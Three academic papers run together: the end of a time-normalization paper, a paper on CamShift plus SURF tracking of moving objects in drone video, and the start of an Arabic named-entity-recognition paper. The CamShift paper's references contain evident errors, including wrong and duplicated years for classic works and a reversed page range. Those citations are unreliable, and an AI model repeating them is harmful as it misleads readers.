the task over a word-based system, and that a multi-output net- work performs better than producing a single output. Furthermore, we have defined a new interval-based evaluation metric that allows us to perform a com- parison between annotations based on both SCATE and TimeML schema, and found that SCATE pro- vides a wider variety of time expressions. Finally, we have seen that the sparse training set available induces model overfitting and that the largest number of errors are committed in those cases that appear less frequently in the annotations. This is more significant in the case of explicit operators because they are very dependent on the lexicon. Improving performance on these cases is our main goal for future work. Accord- ing to the results presented in this work, it seems that a solution would be to obtain a wider training set, so a promising research line is to extend our approach to automatically generate new annotations. 9 Software The code for the SCATE-style time normalization models introduced in this paper is available at https://github.com/clulab/timenorm. 10 Acknowledgements We thank the anonymous reviewers as well as the action editor, Mona Diab, for helpful comments on an earlier draft of this paper. The work was funded by the THYME project (R01LM010090) from the National Library Of Medicine, and used computing resources supported by the National Science Founda- tion under Grant No. 1228509. The content is solely the responsibility of the authors and does not nec- essarily represent the official views of the National Library Of Medicine, National Institutes of Health, or National Science Foundation. References [Bethard and Parker2016] Steven Bethard and Jonathan Parker. 2016. A semantically compositional anno- tation scheme for time normalization. In Proceedings 354 of the Tenth International Conference on Language Re- sources and Evaluation (LREC 2016), Paris, France, 5. European Language Resources Association (ELRA). [Bethard2013] Steven Bethard. 2013. A synchronous con- text free grammar for time normalization. In Proceed- ings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 821–826, Seattle, Washington, USA, 10. Association for Computational Linguistics. [Bird et al.2009] Steven Bird, Ewan Klein, and Edward Loper. 2009. Natural language processing with Python: analyzing text with the natural language toolkit. O’Reilly Media, Inc. [Chiu and Nichols2016] Jason P. C. Chiu and Eric Nichols. 2016. Named Entity Recognition with Bidirectional LSTM-CNNs. Transactions of the Association for Computational Linguistic, 4:357–370. [Chung et al.2014] Junyoung Chung, Caglar Gulcehre, KyungHyun Cho, and Yoshua Bengio. 2014. Empiri- cal evaluation of gated recurrent neural networks on se- quence modeling. arXiv preprint arXiv:1412.3555v1. [Collobert et al.2011] Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (al- most) from scratch. The Journal of Machine Learning Research, 12:2493–2537, November. [Fischer and Strötgen2015] Frank Fischer and Jannik Strötgen. 2015. When Does (German) Literature Take Place? On the Analysis of Temporal Expressions in Large Corpora. In Proceedings of DH 2015: Annual Conference of the Alliance of Digital Humanities Orga- nizations, volume 6, Sydney, Australia. [Gillick et al.2016] Dan Gillick, Cliff Brunk, Oriol Vinyals, and Amarnag Subramanya. 2016. Multilin- gual language processing from bytes. In Kevin Knight, Ani Nenkova, and Owen Rambow, editors, NAACL HLT 2016, The 2016 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, San Diego California, USA, June 12-17, 2016, pages 1296–1306. The Association for Computational Linguistics. [Graves et al.2013] Alex Graves, Abdel-rahman Mo- hamed, and Geoffrey Hinton. 2013. Speech recog- nition with deep recurrent neural networks. In 2013 IEEE International Conference on Acoustics, Speech and Signal Processing, pages 6645–6649. IEEE. [Han and Lavie2004] Benjamin Han and Alon Lavie. 2004. A framework for resolution of time in natural language. 3(1):11–32, March. [Huang et al.2015] Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidirectional LSTM-CRF models for sequence tagging. CoRR, abs/1508.01991. [Kuru et al.2016] Onur Kuru, Ozan Arkan Can, and Deniz Yuret. 2016. Charner: Character-level named entity recognition. In COLING 2016, 26th International Con- ference on Computational Linguistics, Proceedings of the Conference: Technical Papers, December 11-16, 2016, Osaka, Japan, pages 911–921. [Lample et al.2016a] Guillaume Lample, Miguel Balles- teros, Sandeep Subramanian, Kazuya Kawakami, and Chris Dyer. 2016a. Neural architectures for named entity recognition. In Proceedings of the 2016 Con- ference of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies, pages 260–270. Association for Compu- tational Linguistics. [Lample et al.2016b] Guillaume Lample, Miguel Balles- teros, Sandeep Subramanian, Kazuya Kawakami, and Chris Dyer. 2016b. Neural architectures for named entity recognition. In NAACL HLT 2016, The 2016 Conference of the North American Chapter of the As- sociation for Computational Linguistics: Human Lan- guage Technologies, San Diego California, USA, June 12-17, 2016, pages 260–270. [Lee et al.2014] Kenton Lee, Yoav Artzi, Jesse Dodge, and Luke Zettlemoyer. 2014. Context-dependent semantic parsing for time expressions. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1437–1447, Baltimore, Maryland, 6. Association for Computational Linguistics. [Lin et al.2015] Chen Lin, Elizabeth W. Karlson, Dmitriy Dligach, Monica P. Ramirez, Timothy A. Miller, Huan Mo, Natalie S. Braggs, Andrew Cagan, Vivian S. Gainer, Joshua C. Denny, and Guergana K. Savova. 2015. Automatic identification of methotrexate- induced liver toxicity in patients with rheumatoid arthritis from the electronic medical record. Jour- nal of the American Medical Informatics Association, 22(e1):e151–e161. [Llorens et al.2012] Hector Llorens, Leon Derczynski, Robert J. Gaizauskas, and Estela Saquete. 2012. TIMEN: An Open Temporal Expression Normalisa- tion Resource. In Language Resources and Evaluation Conference, pages 3044–3051. European Language Re- sources Association (ELRA). [Ma and Hovy2016] Xuezhe Ma and Eduard Hovy. 2016. End-to-end Sequence Labeling via Bi-directional LSTM-CNNs-CRF. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics (ACL 2016), volume 1. Association for Computa- tional Linguistics. [Mazur and Dale2010] Pawet Mazur and Robert Dale. 2010. Wikiwars: A new corpus for research on tempo- ral expressions. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, EMNLP ’10, pages 913–922, Stroudsburg, PA, USA. Association for Computational Linguistics. 355 [Plank et al.2016] Barbara Plank, Anders Søgaard, and Yoav Goldberg. 2016. Multilingual part-of-speech tag- ging with bidirectional long short-term memory models and auxiliary loss. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguis- tics (Volume 2: Short Papers), pages 412–418, Berlin, Germany, August. Association for Computational Lin- guistics. [Pustejovsky et al.2003a] James Pustejovsky, José Castaño, Robert Ingria, Roser Saurı́, Robert Gaizauskas, Andrea Setzer, and Graham Katz. 2003a. TimeML: Robust Specification of Event and Temporal Expressions in Text. In IWCS-5, Fifth International Workshop on Computational Semantics. [Pustejovsky et al.2003b] James Pustejovsky, Patrick Hanks, Roser Sauri, Andrew See, Robert Gaizauskas, Andrea Setzer, Dragomir Radev, Beth Sundheim, David Day, Lisa Ferro, and Marcia Lazo. 2003b. The TimeBank corpus. In Proceedings of Corpus Linguistics 2003, Lancaster. [Pustejovsky et al.2010] James Pustejovsky, Kiyong Lee, Harry Bunt, and Laurent Romary. 2010. ISO-TimeML: An International Standard for Semantic Annotation. In Proceedings of the 7th International Conference on Language Resources and Evaluation (LREC’10), Val- letta, Malta. European Language Resources Associa- tion (ELRA). [Qi et al.2009] Yanjun Qi, Koray Kavukcuoglu, Ronan Collobert, Jason Weston, and Pavel P. Kuksa. 2009. Combining labeled and unlabeled data with word-class distribution learning. In Proceedings of the 18th ACM conference on Information and knowledge management, ACM, pages 1737–1740. [Schilder2004] Frank Schilder. 2004. Extracting meaning from temporal nouns and temporal prepositions. ACM Transactions on Asian Language Information Process- ing (TALIP) - Special Issue on Temporal Information Processing, 3(1):33–50, March. [Strötgen and Gertz2013] Jannik Strötgen and Michael Gertz. 2013. Multilingual and cross-domain tem- poral tagging. Language Resources and Evaluation, 47(2):269–298. [Strötgen and Gertz2015] Jannik Strötgen and Michael Gertz. 2015. A baseline temporal tagger for all lan- guages. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 541–547, Lisbon, Portugal, September. Associa- tion for Computational Linguistics. [Strötgen et al.2013] Jannik Strötgen, Julian Zell, and Michael Gertz. 2013. Heideltime: Tuning English and developing Spanish resources for TempEval-3. In Proceedings of the Seventh International Workshop on Semantic Evaluation, SemEval ’13, pages 15–19. Asso- ciation for Computational Linguistics. [Toutanova et al.2003] Kristina Toutanova, Dan Klein, Christopher D. Manning, and Yoram Singer. 2003. Feature-rich part-of-speech tagging with a cyclic de- pendency network. In Proceedings of the 2003 Confer- ence of the North American Chapter of the Association for Computational Linguistics on Human Language Technology - Volume 1, NAACL ’03, pages 173–180, Stroudsburg, PA, USA. Association for Computational Linguistics. [UzZaman et al.2013] Naushad UzZaman, Hector Llorens, Leon Derczynski, James Allen, Marc Verhagen, and James Pustejovsky. 2013. SemEval-2013 Task 1: TempEval-3: Evaluating Time Expressions, Events, and Temporal Relations. In Second Joint Conference on Lexical and Computational Semantics (*SEM), Volume 2: Proceedings of the Seventh International Workshop on Semantic Evaluation (SemEval 2013), pages 1–9, At- lanta, Georgia, USA, 6. Association for Computational Linguistics. [Verhagen et al.2007] Marc Verhagen, Robert Gaizauskas, Frank Schilder, Mark Hepple, Graham Katz, and James Pustejovsky. 2007. SemEval-2007 Task 15: TempEval Temporal Relation Identification. In Proceedings of the 4th International Workshop on Semantic Evaluations, SemEval ’07, pages 75–80, Prague, Czech Republic. [Verhagen et al.2010] Marc Verhagen, Roser Sauri, Tom- maso Caselli, and James Pustejovsky. 2010. SemEval- 2010 Task 13: TempEval-2. In Proceedings of the 5th International Workshop on Semantic Evaluation, pages 57–62, Uppsala, Sweden, 7. Association for Computa- tional Linguistics. [Vossen et al.2016] Piek Vossen, Rodrigo Agerri, Itziar Aldabe, Agata Cybulska, Marieke van Erp, Antske Fokkens, Egoitz Laparra, Anne-Lyse Minard, Alessio Palmero Aprosio, German Rigau, Marco Rospocher, and Roxane Segers. 2016. NewsReader: Using knowledge resources in a cross-lingual reading machine to generate more knowledge from massive streams of news. Special Issue Knowledge-Based Systems, Elsevier. 356 work_2sjrdf2ktjborjpbns3i4rort4 ---- 基于CamShift的视频跟踪算法改进及实现 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 97 Improvement and Realization of CamShift Algorithm Based MotionImage Tracking Wang Yubian* Department of Railway Transportation Control Belarusian State University of Transport, 34, Kirova street, Gomel,246653, Republic of Belarus *is the communication author. e-mail: alika_wang@mail.ru Yuri Shebzukhov Department of the International Relations Belarusian State University of Transport, Republic of Belarus 34, Kirova street, Gomel, 246653, Republic of Belarus e-mail: oms@bsut.by Abstract—The detection and tracking technology of moving object image is one of the key technologies of computer vision, and is widely used in many fields such as industry, transportation, and military. The detection and tracing of moving object in the motion scenes based on the UAV platform is a technical difficulty in this field. In practical applications, the characteristics of complicated environment, small target object and moving platform require higher real-time performance and reliability of the algorithm. If it is possible to add some other features of the target to the tracking process, it will be possible to improve the shortcomings of Camshift itself. Based on the Camshift tracking algorithm, this paper integrates SURF feature detection into the algorithm, which greatly improves the tracking accuracy of the target object, and also has better real-time performance which can achieve better tracking performance of the object. Keywords-Motion Image; CamShift Algorithm; SURF; Feature Detection I. INTRODUCTION Video tracking is the key technology for motion target object detection in dynamic sceneson UAV platform. It can be realized by two methods: one is based on target recognition technology, of which the core concept is frame-by-frame recognition algorithm for motion video to identify the target object and determine the target matching. The other is based on the detection technology of the moving object, of which the core concept is the active detection of the moving object, and the position of the moving object is determined in accordance with the detection result to realize the tracking.This method can achieve the tracking of any moving object without the need of complicated priori information for detection, such ascharacteristics of object shape, object sizes. However, the tracking effect of various tracking algorithms also depends on the background migration of the object, the unpredictable tracking path, the unpredictable target motion path and mode, the scene switch, the target object movement does not have an analyzable pattern, the change of camera model, the camera shift, and the change of illumination condition. And the causes of the changes in the color and shape of the moving object are very different [1]. The current mainstream motion object tracking methods with good tracking performance mainly include feature-based tracking methods, region-based tracking methods, model-based tracking methods, motion estimation-based tracking methods, and contour-based tracking methods. The detection and tracking algorithm of the conventional motion object is only suitable for the scene with static or almost static background, but it is not suitable for the detection and tracking of moving objects in the UAV video. Therefore, the digital sequence information of the video images acquired by the drone should meet the real-time, Accurate, robust and other requirements [2]. The current research shows that the target object tracking method based on Camshift algorithm can meet the requirements of drone video target tracking. The CamShift algorithm performs target object recognition and tracking by analyzing the Hue component DOI: 10.21307/ijanmc-2019-028 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 98 information of the target region in the HSV color space. The target has low deformation sensitivity. The algorithm has good real-time performance, little computationand low complexity. Therefore it has been extensively studied. In the video target tracking by drone, the Camshift algorithm [3],comparing to other tracking methods, has many advantages and disadvantages. Under the condition such as the similar color setting to the target object in the background or in the complicated scene, the Camshift algorithm may have tracking error or fail to track because of the tracking characteristicsthat the algorithm is based on the color information of the moving object. If other auxiliary features of the object can be obtained during the search process and input conditionsof algorithm are specified, it is possible to make up for the problems caused by Camshift in such scenes. Because the SURF algorithm has the advantage of good object recognition, the implementation of the SpeedUp Robust Features (SURF) in the Camshift algorithm will greatly improve the tracking accuracy and the tracking reliability of the object. The improved method ensures the good real-time performance of the tracking, greatly improves the tracking accuracy of the object by UAV, and eventually achieves a better tracking effect of the moving object. II. THE CHARACTERISTICS OF SURF The tracking of the characteristics of the target object isbased on the tracking of point of interest, which is often used in engineering applications and it works well. The difficulty of this method lies in the selection and extraction of features [4]. The selection of features should be able to fully cover the key features of the target object in different scene settings, and such features shall also be convenientfor extraction. In general, if the number of sampling points is insufficient in the process of extracting features, it is easy to lose tracking of the object and the tracking effectwould deteriorate. On the contrary, the calculation amount and complexity will be greatly increased, and unableto satisfy the actual application. Although the Harris corner detection method is a traditional point of interest detection method, due to its fixed scale characteristics, it is becoming difficult to determine the change ofposition of the target object between image frames when the target object is deformed or there is change in dimensions. Prof. David G. Lowe of the University of British Columbia in Canada first proposed the Scale Invariant Feature Transform (SIFT) [5]. The SIFT algorithm for querying feature key points is to use feature detection within the constructed scale. The orientational selection of point of interest is calculated according to the gradient of its neighborhood, thus achieving the goal that the feature in the scale does not change in accordance with the orientation. However, the algorithm requires high computational complexity, and has high requirements for hardware devices, and a shortcoming of poor real-time computation. On the basis of this algorithm, Yan Ke et al. introduced the Principal Components Analysis(PCA) in the SIFT system and proposed the PCA-SIFT algorithm, which profoundly improved the matching inefficiency of the common SIFT algorithm. However, this method will lead to the failure of feature extraction in the later stage as well as the deterioration of the characteristic distinctiveness. On this basis, some people have proposed a point of interest algorithm based on SURF [6]. The extracted features are used as the key local features of the images. The speed of the fast calculation is improved by the integral image method. Then the point of interest obtained by Haar wavelet transform are used to obtain the main orientation and its feature vector [7]. Finally, the Euclidean metric is calculated to verify the matching effect between the images. The SURF feature is invariant in the presence of changes in brightness, translation, rotation, and scale. In addition, the method does not show any negative effect to its robustness under noise interference conditions even if the viewing angle changes. This method not only realizes theaccurate feature recognition, but also reduces the computational complexity, which greatly improves the inefficiency of the method in use, and has broad application. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 99 III. THE SURF ALGORITHM A. Constructing Hessian matrix SURF relies on approximation of the determinant images of Hessian matrix. The Hessian matrix is the core of the SURF algorithm [8]. First, the Hessian matrix of each pixel is calculated according to the equation, and then the Hessian matrix discriminant is used to determine whether the point is an extremum. Gaussian filtering is used to construct the Gaussian pyramid [9]. Compared with the Gaussian pyramid construction process of SIFT algorithm, the speed of SURF algorithm is improved. In the SURF algorithm, the image space occupancy of each set is different. The previous set of images is downsampled by 1/4 to obtain the next scale. At the same time, the same set of images has the same size, and the difference is that different scales σ are used. In addition, in the process of blurring, the Gaussian template size is always constant, and only the scale changes σ. For the SURF algorithm, the image size remains the same, only the Gaussian blur template size and scale σ need to be changed. B. Preliminary determination of point of interestusing non-maximum suppression Each pixel processed by the hessian matrix is compared with its 26 points in the three-dimensional domain. If it is the extremum of these points, it shall beselected as a preliminary point of interest for the next process [10]. The detection process uses a filter corresponding to the size of the scale image to detect. In this paper, a 3×3 filter is used as an example for detection analysis. The point of interestfor detection which is one of the 9 pixel points in the scale and the remaining 8 points in the scale is compared with the 9 pixel pointsin each of theadjacenttwo scale layers above and below it to complete the calculation of 26 points in the three-dimensional domain. C. Precisely locate extremum The three-dimensional linear interpolation method removes the points whose valuesare less than a certain threshold, but the sub-pixel point of interest can be obtained, and the extremumbe increased, the number of detected point of interest is therefore reduced, and finally several highly-featured points are detected and the amount of workis reduced [11]. D. Select the main orientation of the point of interest In order to ensure the rotational invariance, the gradient histogram is not countedin the SURF, but the Haar wavelet response around the point of interestregion is computed [12]. That is, centering on the point of interest, within the circular neighborhood of a radius of 6s (s is the scale of the point of interest), the Haar wavelet side length is 4s, and the Haar wavelet response of all points in the 60 degree fan in both x- and y-directions is computed. Sum, and assign a Gaussian weight coefficient to the Haar wavelet responses, to improve the contribution of the response close to the point of interest, suppress the contribution of the response away from the point of interest, and then add the response within the range of 60 degrees, eventually yielding a new vector, traversing the whole circular region. The main orientation of the point of interestwas defined by the orientation of the longest vector [13]. E. Construct descriptor of the SURF point of interest[14] Extract a square region around the point of interest. The size of the window is 20s. The orientation of the region is the main orientation detected in step 2.4. The region is then divided into 16 sub-regions, each of which the Haar wavelet responses of the x- and y-direction of 25 pixels are summed, where the x- and y-directions are relative to the main orientation. The Haar wavelet response is the sum of the horizontal direction, the sum of the absolute values in the horizontal direction, the sum of the vertical directions, and the sum of the absolute values in the vertical direction. IV. EXTRACT AND MATCH THE POINT OF INTEREST （1）Select a frame from the drone tracking video and extract the points of interest using SURF detection method, as shown in Figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 100 Figure 1. Extract points of interest （2）Matching the target region. After selecting the target region, extract the target regions in the adjacent two frames and match the points of interest of the two frames. In Figure 2, it can be seen that 6 points of interest are successfully matched. Figure 2. Matching the points of interest V. VERIFICATION After manually selecting the target window, the feedback mechanism is used to calculate the color similarity between the Camshift tracking window and the initial window, and the feature similarity between the SURF tracking window and the initial window. Suppress the major displacement, and assign the weight of displacement dynamically to the two tracking algorithms in accordance with Bhattacharyya distance [15]. The Camshift tracking algorithm is preferred when the motion tracking is stable, and otherwise, the SURF tracking method [16] is preferred. The experiments show that the tracking method is ideal for tracking, and it can solve the problem of tracking interference caused by background changes and object similarity. Takes a picture of tracking object every 15 seconds, and an example is shown in Figures 3, 4, 5, and 6. Figure 3. Tracking image 1 Figure 4. Tracking image 2 Figure 5. Tracking image 3 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 101 Figure 6. Tracking image 4 As shown in the above figures 3, 4, 5, and 6, the drone has achieved good results in tracking the moving object. VI. CONCLUSION Based on the classic tracking algorithm Camshift and focused on the deficiencies of the algorithm in the motion object tracking of drone video, this paper proposes the combination of Camshift algorithm and SURF feature detection to realize the tracking of motion object in UAV video. The experimental results show that the proposed method can effectively track and locate the target object in the more complex aerial photography background. The experiment has achieved good results, basically realizes the tracking of the moving object, and the tracking speed is fast, thus the real-time performance is satisfactory and the timeconsumption is little. However, in practical applications, the environment of the object tracking is more complicated and diverse. The further study of this paper can be carried out in the following respects: This paper only studied the tracking of a single object, which does not involve the tracking of multiple similar objects. The multi-object tracking has practical significance in video surveillance, intelligent traffic detection, air formation, and geographic monitoring. Therefore, it is very necessary to further study the tracking of multiple objects; the object tracking system in this paper needs to be improved, including optimization of the logic system and add the feature of parallel processing to improve the tracking efficiency of the system. The Camshift algorithm in this paper is still based on color histogram, which is sensitive to changes in illuminance and the change in color of objects. When the resolution of the camera is not high and the ambient light is insufficient, the tracking effect is not good,therefore the study should focus on the tracking of physical features that are insensitive to illumination. REFERENCES [1] Liu yanli, tang xianqi, Chen yuedong. Application research of moving target tracking algorithm based on improved Camshift [J]. Journal of Anhui Polytechnic University,2012, 27(2):74-77. [2] Xiong TAN, Xuchu YU, Jingzheng LIU, Weijie HUANG. Object Fast Tracking Based on Unmanned Aerial Vehicle Video[C]//Proceedings of PACIIA, IEEE Presss,2010:244-248. [3] C. Harris, M. J. Stephens. A Combined Corner and Edge Detector[C]. Prco of the 4th Alvey Vision Conf, 2013: 147-152. [4] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints[J]. International Journal of Computer Vision.2014, 60(2): 91-110. [5] C. Harris, M. J. Stephens. A Combined Corner and Edge Detector[C]. Prco of the 4th Alvey Vision Conf, 2015: 147-152. [6] D. G. Lowe. Distinctive Image Features from Scale-Invariant Keypoints[J]. International Journal of Computer Vision.2014, 60(2): 91-110. [7] Liu yawei. Review of target detection and tracking methods in uav aerial photography video [J]. Airborne missile,2016.(9):53-56. [8] Yan K,Sukthankar:a more distinctive representation for local image descriptors[C]//ProceedingsofCVPR,Los Alamitos,IEEE press,2014:268-235. [9] Bay H,Ess A,Tuytelaars T.Speeded up robust features(SURF).[J]Computer Vision and Image Understanding,2007,110(3):346-359. [10] Leutenegger S,Chli M,Siegwart R.BRISK:binary robust invariant scalable keypoints.[C]//Proceedings of ICCV,IEEE Press,2013:326-329. [11] Cui zhe. Image feature point extraction and matching based on SIFT algorithm [D]. Xi 'an: XiDian: university.2016:38-46. [12] Yu huai, Yang wen. A fast feature extraction and matching algorithm for uav aerial images [J]. Journal of electronics and information technology, 2016, 38(3):509-516. [13] Wang jianxiong. Research on key technologies of low altitude photogrammetry of unmanned airship and practice of large scale map formation [D]. Xi 'an: chang 'an university, 2011:36-48. [14] Li yifei, research on PID control in four-rotor aircraft,[J] technology and market, 2016.07:90-91. [15] Li xiang, wang yongjun, li zhi, misalignment error and correction of attitude system vector sensor,[J] journal of sensor technology, 2017.02:266-271. [16] Wang donghua, yue dawei. Design and implementation of large remote sensing image correction effect detection system,[J] computer programming skills and maintenance,2015.12:118-120. http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=SJES&filename=SJES13011501083888&v=MTMyOTA0UFFIL2lyUmRHZXJxUVRNbndaZVp1SGlublU3N0pKbG9jYnhNPU5pZk9mYks3SHRETnFvOUVaT01NQkhReG9CTVQ2VA==&uid=WEEvREcwSlJHSldRa1Fhb09jSnZpZ08yWkh6OUZSbjYwY0pIaGNMdmlKTT0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4ggI8Fm4gTkoUKaID8j8gFw!! http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=SJES&filename=SJES13011501083888&v=MTMyOTA0UFFIL2lyUmRHZXJxUVRNbndaZVp1SGlublU3N0pKbG9jYnhNPU5pZk9mYks3SHRETnFvOUVaT01NQkhReG9CTVQ2VA==&uid=WEEvREcwSlJHSldRa1Fhb09jSnZpZ08yWkh6OUZSbjYwY0pIaGNMdmlKTT0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4ggI8Fm4gTkoUKaID8j8gFw!! http://kns.cnki.net/kcms/detail/detail.aspx?dbcode=SJES&filename=SJES13011501083888&v=MTMyOTA0UFFIL2lyUmRHZXJxUVRNbndaZVp1SGlublU3N0pKbG9jYnhNPU5pZk9mYks3SHRETnFvOUVaT01NQkhReG9CTVQ2VA==&uid=WEEvREcwSlJHSldRa1Fhb09jSnZpZ08yWkh6OUZSbjYwY0pIaGNMdmlKTT0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4ggI8Fm4gTkoUKaID8j8gFw!! http://scholar.cnki.net/result.aspx?q=Brisk:Binary%20robust%20invatiant%20scalable%20keypoints http://scholar.cnki.net/result.aspx?q=Brisk:Binary%20robust%20invatiant%20scalable%20keypoints http://scholar.cnki.net/result.aspx?q=Brisk:Binary%20robust%20invatiant%20scalable%20keypoints work_2sn25vxvsrbzrjcp6ps7nehcte ---- Combining Minimally-supervised Methods for Arabic Named Entity Recognition Maha Althobaiti, Udo Kruschwitz, and Massimo Poesio School of Computer Science and Electronic Engineering University of Essex Colchester, UK {mjaltha, udo, poesio}@essex.ac.uk Abstract Supervised methods can achieve high perfor- mance on NLP tasks, such as Named En- tity Recognition (NER), but new annotations are required for every new domain and/or genre change. This has motivated research in minimally supervised methods such as semi- supervised learning and distant learning, but neither technique has yet achieved perfor- mance levels comparable to those of super- vised methods. Semi-supervised methods tend to have very high precision but compar- atively low recall, whereas distant learning tends to achieve higher recall but lower pre- cision. This complementarity suggests that better results may be obtained by combining the two types of minimally supervised meth- ods. In this paper we present a novel ap- proach to Arabic NER using a combination of semi-supervised and distant learning tech- niques. We trained a semi-supervised NER classifier and another one using distant learn- ing techniques, and then combined them using a variety of classifier combination schemes, including the Bayesian Classifier Combina- tion (BCC) procedure recently proposed for sentiment analysis. According to our results, the BCC model leads to an increase in per- formance of 8 percentage points over the best base classifiers. 1 Introduction Supervised learning techniques are very effective and widely used to solve many NLP problems, in- cluding NER (Sekine and others, 1998; Benajiba et al., 2007a; Darwish, 2013). The main disadvantage of supervised techniques, however, is the need for a large annotated corpus. Although a considerable amount of annotated data is available for many lan- guages, including Arabic (Zaghouani, 2014), chang- ing the domain or expanding the set of classes al- ways requires domain-specific experts and new an- notated data, both of which demand time and effort. Therefore, much of the current research on NER focuses on approaches that require minimal human intervention to export the named entity (NE) clas- sifiers to new domains and to expand NE classes (Nadeau, 2007; Nothman et al., 2013). Semi-supervised (Abney, 2010) and distant learn- ing approaches (Mintz et al., 2009; Nothman et al., 2013) are alternatives to supervised methods that do not require manually annotated data. These approaches have proved to be effective and easily adaptable to new NE types. However, the perfor- mance of such methods tends to be lower than that achieved with supervised methods (Althobaiti et al., 2013; Nadeau, 2007; Nothman et al., 2013). We propose combining these two minimally su- pervised methods in order to exploit their respective strengths and thereby obtain better results. Semi- supervised learning tends to be more precise than distant learning, which in turn leads to higher re- call than semi-supervised learning. In this work, we use various classifier combination schemes to combine the minimal supervision methods. Most previous studies have examined classifier combi- nation schemes to combine multiple supervised- learning systems (Florian et al., 2003; Saha and Ekbal, 2013), but this research is the first to com- bine minimal supervision approaches. In addition, 243 Transactions of the Association for Computational Linguistics, vol. 3, pp. 243–255, 2015. Action Editor: Ryan McDonald. Submission batch: 1/2015; Revision batch 4/2015; Published 5/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. we report our results from testing the recently pro- posed Independent Bayesian Classifier Combination (IBCC) scheme (Kim and Ghahramani, 2012; Lev- enberg et al., 2014) and comparing it with traditional voting methods for ensemble combination. 2 Background 2.1 Arabic NER A lot of research has been devoted to Arabic NER over the past ten years. Much of the initial work em- ployed hand-written rule-based techniques (Mesfar, 2007; Shaalan and Raza, 2009; Elsebai et al., 2009). More recent approaches to Arabic NER are based on supervised learning techniques. The most common supervised learning techniques investigated for Ara- bic NER are Maximum Entropy (ME) (Benajiba et al., 2007b), Support Vector Machines (SVMs) (Be- najiba et al., 2008), and Conditional Random Fields (CRFs) (Benajiba and Rosso, 2008; Abdul-Hamid and Darwish, 2010). Darwish (2013) presented cross-lingual features for NER that make use of the linguistic properties and knowledge bases of another language. In his study, English capitalisation features and an English knowledge base (DBpedia) were exploited as dis- criminative features for Arabic NER. A large Ma- chine Translation (MT) phrase table and Wikipedia cross-lingual links were used for translation between Arabic and English. The results showed an overall F-score of 84.3% with an improvement of 5.5% over a strong baseline system on a standard dataset (the ANERcorp set collected by Benajiba et al. (2007a)). Abdallah et al. (2012) proposed a hybrid NER system for Arabic that integrates a rule-based sys- tem with a decision tree classifier. Their inte- grated approach increased the F-score by between 8% and 14% when compared to the original rule based system and the pure machine learning tech- nique. Oudah and Shaalan (2012) also developed hybrid Arabic NER systems that integrate a rule- based approach with three different supervised tech- niques: decision trees, SVMs, and logistic regres- sion. Their best hybrid system outperforms state-of- the-art Arabic NER systems (Benajiba and Rosso, 2008; Abdallah et al., 2012) on standard test sets. 2.2 Minimal Supervision and NER Much current research seeks adequate alternatives to expensive corpus annotation that address the limita- tions of supervised learning methods: the need for substantial human intervention and the limited num- ber of NE classes that can be handled by the system. Semi-supervised techniques and distant learning are examples of methods that require minimal supervi- sion. Semi-supervised learning (SSL) (Abney, 2010) has been used for various NLP tasks, including NER (Nadeau, 2007). ‘Bootstrapping’ is the most com- mon semi-supervised technique. Bootstrapping in- volves a small degree of supervision, such as a set of seeds, to initiate the learning process (Nadeau and Sekine, 2007). An early study that introduced mutual bootstrapping and proved highly influential is (Riloff and Jones, 1999). They presented an al- gorithm that begins with a set of seed examples of a particular entity type. Then, all contexts found around these seeds in a large corpus are compiled, ranked, and used to find new examples. Pasca et al. (2006) used the same bootstrapping technique as Riloff and Jones (1999), but applied the technique to very large corpora and managed to generate one million facts with a precision rate of about 88%. Ab- delRahman et al. (2010) proposed to integrate boot- strapping semi-supervised pattern recognition and a Conditional Random Fields (CRFs) classifier. They used semi-supervised pattern recognition in order to generate patterns that were then used as features in the CRFs classifier. Distant learning (DL) is another popular paradigm that avoids the high cost of supervision. It depends on the use of external knowledge (e.g., encyclopedias such as Wikipedia, unlabelled large corpora, or external semantic repositories) to increase the performance of the classifier, or to automatically create new resources for use in the learning process (Mintz et al., 2009; Nguyen and Moschitti, 2011). Nothman et al. (2013) automatically created massive, multilingual training annotations for NER by exploiting the text and in- ternal structure of Wikipedia. They first categorised Wikipedia articles into a specific set of named entity types across nine languages: Dutch, English, French, German, Italian, Polish, Portuguese, Rus- 244 sian, and Spanish. Then, Wikipedia’s links were transformed into named entity annotations based on the NE types of the target articles. Following this approach, millions of words were annotated in the aforementioned nine languages. Their method for automatically deriving corpora from Wikipedia outperformed the methods proposed by Richman and Schone (2008) and Mika et al. (2008) when testing the Wikipedia-trained models on CONLL shared task data and other gold-standard corpora. Alotaibi and Lee (2013) presented a methodology to automatically build two NE-annotated sets from Arabic Wikipedia. The corpora were built by transforming links into NE annotations according to the NE type of the target articles. POS-tagging, morphological analysis, and linked NE phrases were used to detect other mentions of NEs that appear without links in text. Their Wikipedia-trained model performed well when tested on various newswire test sets, but it did not surpass the performance of the supervised classifier that is trained and tested on data sets drawn from the same domain. 2.3 Classifier Combination and NER We are not aware of any previous work combin- ing minimally supervised methods for NER task in Arabic or any other natural language, but there are many studies that have examined classifier com- bination schemes to combine various supervised- learning systems. Florian et al. (2003) presented the best system at the NER CoNLL 2003 task, with an F-score value equal to 88.76%. They used a combination of four diverse NE classifiers: the transformation-based learning classifier, a Hidden Markov Model 